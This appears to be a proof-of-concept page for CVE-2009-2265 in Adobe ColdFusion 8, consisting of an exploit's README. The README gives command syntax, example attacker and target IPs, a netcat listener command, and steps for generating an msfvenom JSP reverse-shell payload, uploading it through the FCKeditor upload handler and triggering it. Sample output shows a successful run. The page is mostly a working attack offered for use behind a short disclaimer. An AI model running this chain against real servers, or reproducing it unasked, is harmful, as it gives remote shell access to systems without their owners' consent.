CVE-2009-2265 PoC — FCKeditor 路径遍历漏洞

Source

Associated Vulnerability

Description

Adobe ColdFusion 8 - Remote Command Execution (RCE)

Readme

# Adobe ColdFusion 8 - Remote Command Execution (RCE) Exploit

### **Overview**
This exploit targets a known vulnerability in Adobe ColdFusion 8 (CVE-2009-2265). It enables remote command execution (RCE) by uploading a malicious JSP payload that establishes a reverse shell connection.

---

### **Exploit Details**
- **CVE**: [CVE-2009-2265](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265)
- **Vulnerability**: Improper handling of file uploads in Adobe ColdFusion 8.
- **Affected Versions**: Adobe ColdFusion 8.
- **Impact**: Allows attackers to execute arbitrary commands on the server.

---

### **Features**
1. Automatically generates a JSP payload using `msfvenom`.
2. Uploads the payload using a multipart POST request.
3. Triggers the payload to establish a reverse shell.
4. Automatically cleans up the local payload files after execution.

---

### **Usage**
To use this exploit, you need the following:
- A Kali Linux machine or a similar penetration testing environment.
- Netcat installed for listening on the specified port.
- A vulnerable Adobe ColdFusion 8 server.

---

### **Command Syntax**
```bash
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
```

#### **Arguments**
- `-l <LHOST>`: Local attacker IP (e.g., 10.10.16.5).
- `-p <LPORT>`: Local attacker port for the reverse shell (e.g., 9001).
- `-r <RHOST>`: Remote target IP (e.g., 10.10.10.11).
- `-q <RPORT>`: Remote target port where ColdFusion is running (e.g., 8500).

---

### **Example Usage**
```bash
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
```

1. Start a listener on your attacker machine:
   ```bash
   nc -lnvp 9001
   ```

2. Run the exploit with the appropriate arguments.

3. Once executed, the payload will connect back to your listener.

---

### **How It Works**
1. **Generate Payload**:
   - The script uses `msfvenom` to generate a malicious JSP payload.
   - The payload initiates a reverse shell to the specified LHOST and LPORT.

2. **Upload Payload**:
   - The payload is uploaded to the vulnerable ColdFusion server using a POST request.

3. **Trigger Payload**:
   - The uploaded payload is executed by sending a GET request to the file's URL.

4. **Establish Reverse Shell**:
   - A reverse shell is established, giving the attacker access to the target system.

---

### **Requirements**
- `msfvenom` for payload generation.
- `curl` for file upload and triggering the payload.
- `nc` (Netcat) for listening to reverse shell connections.

---

### **Example Output**
```plaintext
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
```

---

### **Disclaimer**
This script is for **educational purposes only**. Use it on systems you own or have explicit permission to test. Unauthorized use of this exploit on systems you do not own is illegal and unethical.

--- 

### **Author**
Developed by [0xDTC].

File Snapshot

 [4.0K]  /data/pocs/56b7e5c180efdf6a3fa7719ae0b72e00fa5405f0
├── [3.5K]  CVE-2009-2265
└── [3.4K]  README.md

0 directories, 2 files

Remarks